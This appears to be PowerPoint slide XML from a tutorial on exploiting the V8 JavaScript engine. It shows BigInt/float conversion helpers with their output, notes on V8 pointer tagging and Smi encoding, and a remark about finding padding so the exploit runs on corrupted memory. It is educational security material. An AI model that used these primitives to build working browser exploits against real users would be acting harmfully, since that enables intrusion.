            <a:off x="6136019" y="4280996"/>
            <a:ext cx="3724799" cy="2185214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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let conversion_buffer = new ArrayBuffer(8);</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let float_view = new Float64Array(conversion_buffer);</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let int_view = new BigUint64Array(conversion_buffer);</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BigInt.prototype.b2f = function() {</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int_view[0] = this;</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return float_view[0];</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Number.prototype.f2b = function() {</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float_view[0] = this;</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return int_view[0];</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var a = [0x41d0505050400000n, 1.1];</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console.log('a[0].b2f().toString(16) = 0x' + a[0].b2f().toString(16));</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console.log('a[1].f2b().toString(16) = 0x' + a[1].f2b().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>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Output ------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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a[0].b2f().toString(16) = </a:t>
            </a:r>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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a[1].f2b().toString(16) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3ff199999999999a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="TextBox 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41C1AAA4-63EC-4BC2-BD83-AE2D401C4E76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553825" y="5383429"/>
            <a:ext cx="4938454" cy="338554"/>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altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The error in the dump output is that the memory value was odd. In v8 memory, odd values are treated as objects, and even numbers are treated as data.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="102" name="직선 화살표 연결선 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3D8822-BAA4-4A7E-A2E0-171EAE076C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="37" idx="3"/>
            <a:endCxn id="202" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533650" y="1993900"/>
            <a:ext cx="378752" cy="2135"/>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91DE0171-01CC-4BC9-A743-724F03699A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="3"/>
            <a:endCxn id="44" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533650" y="3220526"/>
            <a:ext cx="377578" cy="5799"/>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7A242904-4386-4BE5-93DE-568AF33C13CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="3"/>
            <a:endCxn id="53" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2533650" y="4309125"/>
            <a:ext cx="375469" cy="2525"/>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38B161F5-2FC5-48A5-87A2-15E7025669EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2954530" y="4307724"/>
            <a:ext cx="2388480" cy="1800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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="연결선: 꺾임 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F918F619-54A5-433E-8A29-BD23E45562F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="79" idx="0"/>
            <a:endCxn id="113" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3138072" y="4372731"/>
            <a:ext cx="895679" cy="1125718"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2106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8A9C3BD0-97C1-445B-9794-A1349664EFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967935" y="4534205"/>
            <a:ext cx="419703" cy="100708"/>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ko-KR" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>????</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="129" name="연결선: 꺾임 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7B0D2F-2B94-4289-97A7-FFA4751D53C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="113" idx="1"/>
            <a:endCxn id="121" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1387638" y="4397737"/>
            <a:ext cx="1566892" cy="186822"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13239"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>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30" name="그룹 229">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C02839-230E-4F0D-9808-68982C729AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134207" y="1389399"/>
            <a:ext cx="5676683" cy="2844201"/>
            <a:chOff x="6134207" y="1389399"/>
            <a:chExt cx="5676683" cy="3008337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="78" name="그림 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C30896-F76D-494D-8631-56153C0DA3DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134210" y="1389399"/>
              <a:ext cx="5676680" cy="3008337"/>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132" name="직사각형 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2134DFFC-7A6B-4F92-AEDD-FED92FD75BD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551469" y="2366617"/>
              <a:ext cx="2101457" cy="218097"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>6 = The number of items 3 x 2 = 6</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="133" name="직사각형 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAEDC028-5397-45C1-80ED-3CCCC439EFFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551469" y="2597311"/>
              <a:ext cx="2101454" cy="218097"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>0x14 = a[0] = 10 = 10 x 2 = 20 = 0x14</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="134" name="직사각형 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFC1EED3-B4AB-4D50-97C8-8F91E8D02E4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8827175" y="2054076"/>
              <a:ext cx="2825752" cy="249253"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>All </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>data are multiples of two, as follows:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="직사각형 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD4384D-6258-4C45-AC50-F84DA6761A41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551472" y="2832705"/>
              <a:ext cx="2101454" cy="218097"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>0x28 = a[1] = 20 = 20 x 2 = 40 = 0x28</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="136" name="직사각형 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720E4234-C29C-4782-AF9A-EE1A280171A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551472" y="3068098"/>
              <a:ext cx="2101454" cy="218097"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>0x3c = a[2] = 30 = 30 x 2 = 60 = 0x3c</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="직사각형 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265FD1E7-63B2-4A24-B492-D85F6DB8DBA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134207" y="2472725"/>
              <a:ext cx="1553267" cy="131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직사각형 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA92AB0A-412B-4246-88E8-C57D952005D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134207" y="2596952"/>
              <a:ext cx="1553267" cy="150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직사각형 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76FE3DE-A94F-4043-9859-D2575C03444D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134208" y="2755035"/>
              <a:ext cx="1553266" cy="13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직사각형 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45D9294-B4F5-4686-AEB6-3BCDB0FA4433}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134208" y="2897982"/>
              <a:ext cx="1553266" cy="133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2" name="연결선: 꺾임 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB84D4A-5760-4E48-90E2-4E23C9F96179}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="132" idx="1"/>
              <a:endCxn id="137" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="7687475" y="2475665"/>
              <a:ext cx="1863995" cy="62873"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18712"/>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4" name="연결선: 꺾임 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9493B6-D5A4-408A-A472-FDC979AE2307}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="133" idx="1"/>
              <a:endCxn id="138" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7687475" y="2672294"/>
              <a:ext cx="1863995" cy="34066"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25665"/>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6" name="연결선: 꺾임 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E210CD-E2A4-4EAA-8081-DCDCE8E7D17C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="135" idx="1"/>
              <a:endCxn id="139" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7687474" y="2822810"/>
              <a:ext cx="1863998" cy="118945"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 33004"/>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6481064F-16DB-449C-B692-7C372D568886}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="136" idx="1"/>
              <a:endCxn id="140" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7687474" y="2964877"/>
              <a:ext cx="1863998" cy="212271"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 41888"/>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02" name="직사각형 201">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7123416A-68A2-4034-8542-AE041324EEB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2912402" y="1906022"/>
            <a:ext cx="1424080" cy="1800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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="직사각형 206">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E402CCA-3607-42CE-8F41-DD86BDC0C33C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049600" y="6278400"/>
            <a:ext cx="424800" cy="120007"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="209" name="연결선: 꺾임 208">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F4F0F3-7674-4408-8A53-ED1B1C6FD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="207" idx="2"/>
            <a:endCxn id="202" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4098055" y="2234462"/>
            <a:ext cx="4402372" cy="3925518"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3067"/>
              <a:gd name="adj2" fmla="val 59675"/>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6" name="직사각형 235">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B6BBD1-6E8D-4F77-8FAF-CF9EE31B8C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409600" y="4757505"/>
            <a:ext cx="3401290" cy="40011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However, the problem is that alignment is broken in corrupt memory. So you need padding.</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244" name="직사각형 243">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C544BE-9643-4909-9C80-9C6A59AE0CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409600" y="5165595"/>
            <a:ext cx="3401290" cy="55399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I worked full time for 3 days to find the padding where the exploit code ran at once. To be honest, I just found it by chance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="직사각형 258">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABC9AF72-24D2-44C5-911D-DD19C9031288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7912800" y="3684026"/>
            <a:ext cx="3898090" cy="40011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Did you notice that only the odd address in the %DumpObjects is showing the object type?</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7" name="슬라이드 번호 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{983F5421-71D1-4F87-8D42-9BB17E1667D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
